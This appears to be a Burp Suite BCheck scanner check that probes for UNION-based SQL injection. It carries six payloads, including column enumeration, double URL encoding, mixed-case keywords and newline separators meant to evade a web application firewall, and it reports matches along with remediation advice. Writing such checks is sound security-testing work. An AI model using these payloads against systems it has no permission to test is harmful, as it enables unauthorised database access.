metadata:
    language: v2-beta
    name: "SQLi - UNION Based with WAF Bypass"
    description: "Tests for UNION-based SQL injection with column enumeration and WAF bypass techniques"
    author: "BCheck Arsenal"
    tags: "sqli", "union", "waf-bypass"

run for each:
    payload = "1' ORDER BY 10-- -",
        "1' UNION SELECT NULL,NULL,NULL,NULL-- -",
        "1%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--",
        "-1' uNiOn SeLeCt 1,2,3 fRoM iNfOrMaTiOn_ScHeMa.tAbLeS-- -",
        "-1' UNION%0ASELECT%0ANULL,NULL,NULL--",
        "-1' uNiOn%20SeLeCt%20null,null,null--"

given insertion point then
    send payload:
        replacing: {payload}

    if not({latest.response.status_code} is "400") then
        if {latest.response.body} matches "(NULL|root@|information_schema|mysql.user|pg_catalog)" then
            report issue:
                severity: high
                confidence: firm
                detail: "UNION-based SQL injection detected. The application returns data from injected UNION SELECT queries."
                remediation: "Use parameterized queries. Implement least-privilege database access."
        end if
    end if